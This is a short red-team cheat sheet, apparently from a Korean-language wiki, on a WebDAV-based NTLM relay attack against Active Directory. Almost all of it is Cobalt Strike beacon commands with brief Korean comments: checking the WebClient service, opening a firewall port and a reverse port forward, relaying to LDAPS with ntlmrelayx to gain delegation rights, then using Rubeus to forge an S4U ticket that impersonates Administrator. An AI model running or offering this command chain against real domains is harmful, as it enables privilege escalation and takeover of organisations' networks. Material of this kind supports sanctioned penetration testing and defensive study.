WebDAV

References
Last updated

Last updated
# WebClient 서비스 활성화 여부 확인
beacon> inline-execute C:\Tools\GetWebDAVStatus_x64.o <Target 1>, <Target 2>
# 리모트 포트 포워딩에 사용할 방화벽 정책 생성
beacon> powershell New-NetFirewallRule -DisplayName "8888-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8888
# 리모트 포트 포워딩 설정
beacon> rportfwd 8888 localhost 8888
# NTLM Relay 준비
proxychains ntlmrelayx.py -t ldaps://<dc-ip> --delegate-access -smb2support --http-port 8888
# AES256 해시 계산
beacon> execute-assembly C:\Tools\Rubeus.exe hash /domain:<domain> /user:<Machine> /password:<PASS>
# S4U를 통한 사용자 가장 티켓 발급
beacon> execute-assembly C:\Tools\Rubeus.exe s4u /user:PVWUMPYT$ /impersonateuser:Administrator /msdsspn:<Service> /aes256:<AES256 Hash> /nowrap